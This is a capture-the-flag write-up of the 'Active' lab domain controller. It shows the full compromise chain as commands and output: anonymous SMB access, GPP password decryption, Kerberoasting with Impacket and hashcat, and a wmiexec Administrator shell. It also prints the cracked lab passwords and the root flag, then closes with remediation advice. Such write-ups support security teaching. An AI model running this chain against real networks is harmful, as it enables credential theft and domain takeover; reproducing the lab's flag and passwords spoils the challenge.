Enumeration
Nmap Scan
Comprehensive port scan revealed a Windows Server 2008 R2 Domain Controller:
nmap -sS -sC -A -T4 -oN first.scan -p- 10.10.10.100
Key Services:
- Port 53: DNS
- Port 88: Kerberos
- Port 135: MSRPC
- Port 139/445: SMB/NetBIOS
- Port 389/636: LDAP
- Port 3268/3269: Global Catalog
Domain identified: active.htb
SMB Enumeration
Share Discovery
smbclient -L //10.10.10.100
Accessible shares (anonymous login):
- NETLOGON
- Replication ?
- SYSVOL
- Users
Replication Share Access
smbclient //10.10.10.100/Replication
Downloaded entire share recursively:
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
Credential Discovery - GPP Password
Groups.xml Discovery
Found in: active.htb/Policies/{GUID}/MACHINE/Preferences/Groups/Groups.xml
Vulnerability: Group Policy Preferences (GPP) passwords stored with weak AES encryption!
Password Decryption
Microsoft published the AES key, making GPP passwords trivially decryptable:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Decrypted credentials: SVC_TGS:GPPstillStandingStrong2k18
Initial Access
SMB Authentication
smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users
Successfully authenticated! Navigated to user directory:
smb: \> cd SVC_TGS/Desktop
smb: \SVC_TGS\Desktop\> get user.txt
User flag obtained! ?
Privilege Escalation - Kerberoasting
LDAP Enumeration
Querying Active Directory for active user accounts:
ldapsearch -x -H 'ldap://10.10.10.100' \
-D 'SVC_TGS' \
-w 'GPPstillStandingStrong2k18' \
-b "dc=active,dc=htb" \
-s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" \
samaccountname | grep sAMAccountName
Results:
- Administrator
- SVC_TGS
Alternative method using Impacket:
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
Service Principal Name (SPN) Discovery
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Administrator SPN found: active/CIFS:445
Kerberos TGS ticket extracted!
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$65da2b...
Ticket Cracking
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt --force
Cracked in 4 seconds:
Administrator:Ticketmaster1968
Root Access
WMI Execution
wmiexec.py active.htb/administrator:[email protected]
Remote shell as Administrator obtained!
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
f99bf9c9cc2aa166f582889914746efb
Root flag captured! ??
Attack Chain Summary
- Anonymous SMB ? Access to Replication share
- GPP Password ? Found encrypted password in Groups.xml
- gpp-decrypt ? Decrypted to obtain SVC_TGS credentials
- SMB as SVC_TGS ? User flag
- LDAP Enumeration ? Identified Administrator account
- Kerberoasting ? Extracted TGS ticket for Administrator
- Hashcat ? Cracked Kerberos ticket
- WMIExec ? Administrator shell and root flag
Key Takeaways
Vulnerabilities Exploited
- Anonymous SMB Access - Replication share accessible without authentication
- GPP Password Vulnerability (MS14-025) - Encrypted passwords in SYSVOL/Replication
- Kerberoasting - Service accounts with SPNs vulnerable to offline cracking
- Weak Password - Administrator password crackable with rockyou.txt
Remediation
- Disable anonymous SMB access
- Remove all Groups.xml files from SYSVOL (MS14-025 patch)
- Use Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs)
- Implement strong password policies (25+ characters for service accounts)
- Monitor for Kerberoasting attempts (Event ID 4769)
Tools Used
- nmap
- smbclient
- gpp-decrypt
- ldapsearch
- Impacket suite (GetADUsers.py, GetUserSPNs.py, wmiexec.py)
- hashcat
Techniques
- SMB enumeration
- GPP password decryption
- LDAP queries
- Kerberoasting (TGS-REP ticket extraction and cracking)
- WMI command execution